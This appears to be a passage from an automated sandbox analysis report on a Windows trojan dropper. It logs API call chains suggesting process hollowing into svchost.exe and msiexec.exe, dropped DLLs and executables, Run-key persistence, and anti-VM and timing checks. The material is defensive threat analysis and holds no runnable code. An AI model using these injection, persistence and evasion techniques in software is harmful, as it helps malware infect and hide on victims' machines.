    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeCode function: 8_2_001E00C0 GetModuleHandleW,VirtualAlloc,GetModuleFileNameW,SetEnvironmentVariableW,GetWindowsDirectoryW,NtQueryInformationProcess,lstrcatW,lstrcatW,CreateFileW,NtCreateSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,CreateProcessW,NtDelayExecution,NtUnmapViewOfSection,NtMapViewOfSection,NtClose,GetThreadContext,NtUnmapViewOfSection,NtUnmapViewOfSection,NtMapViewOfSection,NtResumeThread,NtUnmapViewOfSection,NtClose,NtUnmapViewOfSection,NtClose,NtUnmapViewOfSection,NtClose,CloseHandle,VirtualFree,ExitProcess,
    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00081284 NtAllocateVirtualMemory,
    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00020973 GetProcessHeap,GetVersionExA,NtQueryInformationProcess,NtDelayExecution,VirtualAlloc,GetEnvironmentVariableW,SetEnvironmentVariableW,GetShortPathNameW,wsprintfA,CreateMutexA,GetLastError,SetFileAttributesW,DeleteFileW,VirtualFree,WSAStartup,CreateThread,CloseHandle,CreateThread,CloseHandle,CreateThread,WaitForSingleObject,CloseHandle,NtDelayExecution,SetFileAttributesW,DeleteFileW,VirtualFree,ExitProcess,SetErrorMode,
    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00022B45 NtDelayExecution,VirtualAlloc,ExpandEnvironmentStringsW,GetTickCount,wsprintfW,CreateFileW,WriteFile,CloseHandle,CreateProcessW,CloseHandle,CloseHandle,VirtualFree,HeapFree,
    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00022E82 NtDelayExecution,
    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00022CBA NtDelayExecution,HeapFree,RtlAllocateHeap,wsprintfA,RtlAllocateHeap,lstrlen,HeapFree,HeapFree,ExitProcess,
    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_000228B8 NtDelayExecution,VirtualAlloc,GetModuleFileNameW,CreateFileW,GetFileTime,CloseHandle,lstrcpy,RegOpenKeyExA,wsprintfW,RegQueryValueExW,RegCloseKey,ExpandEnvironmentStringsW,GetTickCount,wsprintfW,CloseHandle,CreateFileW,WriteFile,SetFileTime,CloseHandle,CreateProcessW,CloseHandle,ResumeThread,CloseHandle,CloseHandle,VirtualFree,HeapFree,
    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_000223DC NtDelayExecution,GetTickCount,wsprintfW,VirtualAlloc,ExpandEnvironmentStringsW,SetCurrentDirectoryW,lstrcatW,CreateFileW,WriteFile,CloseHandle,LoadLibraryW,GetProcAddress,FreeLibrary,wsprintfA,lstrcpy,RegOpenKeyExA,lstrlen,RegSetValueExA,RegCloseKey,GetSystemDirectoryW,SetCurrentDirectoryW,VirtualFree,HeapFree,
    Source: Hu25VEa8Dr.exe, 00000004.00000003.350394202.00000000005ED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSHDOCVW.DLL.MUIj% vs Hu25VEa8Dr.exe
    Source: Hu25VEa8Dr.exe, 00000004.00000003.350389547.00000000005E6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSHDOCVW.DLL.MUIj% vs Hu25VEa8Dr.exe
    Source: Hu25VEa8Dr.exe, 00000004.00000003.350397688.00000000005F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSHDOCVW.DLL.MUIj% vs Hu25VEa8Dr.exe
    Source: Hu25VEa8Dr.exe, 00000004.00000003.350301075.00000000005DA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewpdshext.dll.muij% vs Hu25VEa8Dr.exe
    Source: C:\Users\user\AppData\Local\Temp\Sahofivizu.exeSection loaded: gozekeneka.dll
    Source: C:\Users\user\AppData\Local\Temp\Sahofivizu.exeSection loaded: zojemilocan.dll
    Source: C:\Users\user\AppData\Local\Temp\Sahofivizu.exeSection loaded: xuxokuxoka.dll
    Source: C:\Users\user\AppData\Local\Temp\Lohonibuhod.exeSection loaded: jahulocayedo.dll
    Source: C:\Users\user\AppData\Local\Temp\Lohonibuhod.exeSection loaded: firozedikami.dll
    Source: C:\Users\user\AppData\Local\Temp\Lohonibuhod.exeSection loaded: yiduyevutog.dll
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeMemory allocated: 770B0000 page execute and read and write
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeMemory allocated: 771D0000 page execute and read and write
    Source: C:\Users\user\AppData\Local\Temp\Sahofivizu.exeMemory allocated: 770B0000 page execute and read and write
    Source: C:\Users\user\AppData\Local\Temp\Sahofivizu.exeMemory allocated: 771D0000 page execute and read and write
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeMemory allocated: 770B0000 page execute and read and write
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeMemory allocated: 771D0000 page execute and read and write
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeMemory allocated: 770B0000 page execute and read and write
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeMemory allocated: 771D0000 page execute and read and write
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeMemory allocated: 770B0000 page execute and read and write
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeMemory allocated: 771D0000 page execute and read and write
    Source: C:\Users\user\AppData\Local\Temp\Lohonibuhod.exeMemory allocated: 770B0000 page execute and read and write
    Source: C:\Users\user\AppData\Local\Temp\Lohonibuhod.exeMemory allocated: 771D0000 page execute and read and write
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeMemory allocated: 770B0000 page execute and read and write
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeMemory allocated: 771D0000 page execute and read and write
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeMemory allocated: 770B0000 page execute and read and write
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeMemory allocated: 771D0000 page execute and read and write
    Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: 770B0000 page execute and read and write
    Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: 771D0000 page execute and read and write
    Source: Zojemilocan.dll.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: xuxokuxoka.dll.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: Jahulocayedo.dll.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: Hu25VEa8Dr.exeReversingLabs: Detection: 95%
    Source: Hu25VEa8Dr.exeVirustotal: Detection: 81%
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeFile read: C:\Users\user\Desktop\Hu25VEa8Dr.exeJump to behavior
    Source: Hu25VEa8Dr.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: unknownProcess created: C:\Users\user\Desktop\Hu25VEa8Dr.exe C:\Users\user\Desktop\Hu25VEa8Dr.exe
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeProcess created: C:\Users\user\AppData\Local\Temp\Sahofivizu.exe C:\Users\user\AppData\Local\Temp\Sahofivizu.exe" "C:\Users\user\Desktop\Hu25VEa8Dr.exe
    Source: C:\Users\user\AppData\Local\Temp\Sahofivizu.exeProcess created: C:\Users\user\Desktop\Hu25VEa8Dr.exe C:\Users\user\Desktop\Hu25VEa8Dr.exe
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeProcess created: C:\Users\user\Desktop\Hu25VEa8Dr.exe C:\Users\user\Desktop\Hu25VEa8Dr.exe
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeProcess created: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe "C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe"
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeProcess created: C:\Users\user\AppData\Local\Temp\Lohonibuhod.exe "C:\Users\user\AppData\Local\Temp\Lohonibuhod.exe" "C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe"
    Source: C:\Users\user\AppData\Local\Temp\Lohonibuhod.exeProcess created: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe "C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe"
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeProcess created: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe "C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe"
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\syswow64\svchost.exe
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeProcess created: C:\Users\user\AppData\Local\Temp\Sahofivizu.exe C:\Users\user\AppData\Local\Temp\Sahofivizu.exe" "C:\Users\user\Desktop\Hu25VEa8Dr.exe
    Source: C:\Users\user\AppData\Local\Temp\Sahofivizu.exeProcess created: C:\Users\user\Desktop\Hu25VEa8Dr.exe C:\Users\user\Desktop\Hu25VEa8Dr.exe
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeProcess created: C:\Users\user\Desktop\Hu25VEa8Dr.exe C:\Users\user\Desktop\Hu25VEa8Dr.exe
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeProcess created: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe "C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe"
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeProcess created: C:\Users\user\AppData\Local\Temp\Lohonibuhod.exe "C:\Users\user\AppData\Local\Temp\Lohonibuhod.exe" "C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe"
    Source: C:\Users\user\AppData\Local\Temp\Lohonibuhod.exeProcess created: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe "C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe"
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeProcess created: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe "C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe"
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\syswow64\svchost.exe
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-966771315-3019405637-367336477-1006\f554348b930ff81505ce47f7c6b7d232_ea860e7a-a87f-4a88-92ef-38f744458171Jump to behavior
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeFile created: C:\Users\user\AppData\Local\Temp\nshA6F9.tmpJump to behavior
    Source: classification engineClassification label: mal100.troj.evad.winEXE@17/19@7/3
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeCode function: 0_2_00402020 CoCreateInstance,MultiByteToWideChar,
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeCode function: 0_2_004041FC GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeCode function: 4_2_004014F0 _memset,_memset,_memset,_memset,_memset,GetTickCount,OpenMutexW,_memset,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,Process32NextW,GetTempPathW,CreateDirectoryW,CreateFileW,WriteFile,CloseHandle,ShellExecuteExW,ExpandEnvironmentStringsW,CreateDirectoryW,CreateDirectoryW,CreateDirectoryW,ExpandEnvironmentStringsW,GetTempPathW,CreateFileW,WriteFile,CloseHandle,ShellExecuteExW,WaitForSingleObject,WaitForSingleObject,FindFirstChangeNotificationW,WaitForSingleObject,FindNextChangeNotification,WaitForSingleObject,GetFileAttributesW,
    Source: C:\Windows\SysWOW64\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\TLS
    Source: C:\Windows\SysWOW64\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\1703032604
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeCode function: 3_2_00402419 FindResourceA,SizeofResource,LoadResource,LockResource,Sleep,??2@YAPAXI@Z,??_U@YAPAXI@Z,
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeCommand line argument: TLS
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeCommand line argument: avp.exe
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeCommand line argument: \MSI
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeCommand line argument: \msiexec.exe
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeCommand line argument: \Temp
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeCommand line argument: %USERPROFILE%
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeCommand line argument: .exe
    Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: Binary string: T:\ldr\CUSTOM\local\Worm65.DLL.PnP\Release\Worm65.DLL.pdb source: svchost.exe, svchost.exe, 00000009.00000003.373478974.0000000000130000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.381475492.00000000001E0000.00000040.00001000.00020000.00000000.sdmp
    Source: Binary string: T:\ldr\CUSTOM\local\local\Release\ADropper.pdb source: Hu25VEa8Dr.exe, Hu25VEa8Dr.exe, 00000004.00000002.351939006.0000000000400000.00000040.00000400.00020000.00000000.sdmp
    Source: Binary string: svchost.pdb source: svchost.exe, 00000009.00000002.381614429.0000000000CD0000.00000040.80000000.00040000.00000000.sdmp

    Data Obfuscation

    barindex
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeUnpacked PE file: 3.2.Hu25VEa8Dr.exe.400000.0.unpack
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeUnpacked PE file: 4.2.Hu25VEa8Dr.exe.400000.1.unpack
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeUnpacked PE file: 7.2.msiexec.exe.400000.0.unpack
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeUnpacked PE file: 3.2.Hu25VEa8Dr.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .rdata:R;.data:W;.rsrc:R;
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeUnpacked PE file: 4.2.Hu25VEa8Dr.exe.400000.1.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeUnpacked PE file: 7.2.msiexec.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .rdata:R;.data:W;.rsrc:R;
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeUnpacked PE file: 8.2.msiexec.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:EW;
    Source: C:\Users\user\AppData\Local\Temp\Sahofivizu.exeCode function: 2_2_10003A20 push eax; ret
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeCode function: 4_2_00403185 push ecx; ret
    Source: C:\Users\user\AppData\Local\Temp\Lohonibuhod.exeCode function: 6_2_10003A20 push eax; ret
    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_001E5565 push ecx; ret
    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_001EE1CE push 0000006Ah; retf
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeCode function: 0_2_00405D2E GetModuleHandleA,LoadLibraryA,GetProcAddress,
    Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\ProgramData\Local Settings\Temp\msoiruj.batJump to dropped file
    Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\ProgramData\Local Settings\Temp\msoiruj.batJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\Lohonibuhod.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\Firozedikami.dllJump to dropped file
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeFile created: C:\Users\user\AppData\Local\Temp\natigezeholi.dllJump to dropped file
    Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\ProgramData\Local Settings\Temp\msoiruj.batJump to dropped file
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeFile created: C:\Users\user\AppData\Local\Temp\xuxokuxoka.dllJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\Jahulocayedo.dllJump to dropped file
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeFile created: C:\Users\user\AppData\Local\Temp\0BBFF.tmpJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\yiduyevutog.dllJump to dropped file
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeFile created: C:\Users\user\AppData\Local\Temp\Zojemilocan.dllJump to dropped file
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeFile created: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeJump to dropped file
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeFile created: C:\Users\user\AppData\Local\Temp\Sahofivizu.exeJump to dropped file
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeFile created: C:\Users\user\AppData\Local\Temp\Gozekeneka.dllJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\naseropuxeq.dllJump to dropped file

    Boot Survival

    barindex
    Source: C:\Windows\SysWOW64\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run 14108Jump to behavior
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft 00E35EEEJump to behavior
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\Lohonibuhod.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\Lohonibuhod.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\Lohonibuhod.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

    Malware Analysis System Evasion

    barindex
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeCode function: vbox qemu qemu
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeCode function: qemu qemu
    Source: C:\Windows\SysWOW64\svchost.exeCode function: vbox qemu qemu
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeRDTSC instruction interceptor: First address: 0000000000401746 second address: 0000000000401749 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 rdtsc
    Source: C:\Windows\SysWOW64\svchost.exe TID: 1732Thread sleep time: -120000s >= -30000s
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleep
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeCode function: 4_2_00401220 rdtsc
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Disk\Enum name: 0
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeProcess information queried: ProcessInformation
    Source: C:\Users\user\AppData\Local\Temp\Sahofivizu.exeCode function: 2_2_004012F0 ??2@YAPAXI@Z,GetCapture,GetMenu,GetMenuItemInfoA,malloc,GetSystemInfo,xupetipe,_ftol,Negefibizoh,fread,fclose,CreateHatchBrush,??2@YAPAXI@Z,Fetomekiratu,bedevahetay,
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeCode function: 0_2_00405D07 FindFirstFileA,FindClose,
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeCode function: 0_2_00405331 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeCode function: 0_2_0040263E FindFirstFileA,
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeCode function: 5_2_00405D07 FindFirstFileA,FindClose,
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeCode function: 5_2_00405331 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeCode function: 5_2_0040263E FindFirstFileA,
    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_001E1E80 GetFileAttributesW,wsprintfW,wsprintfW,wsprintfW,FindFirstFileW,wsprintfW,wsprintfW,MoveFileExW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,
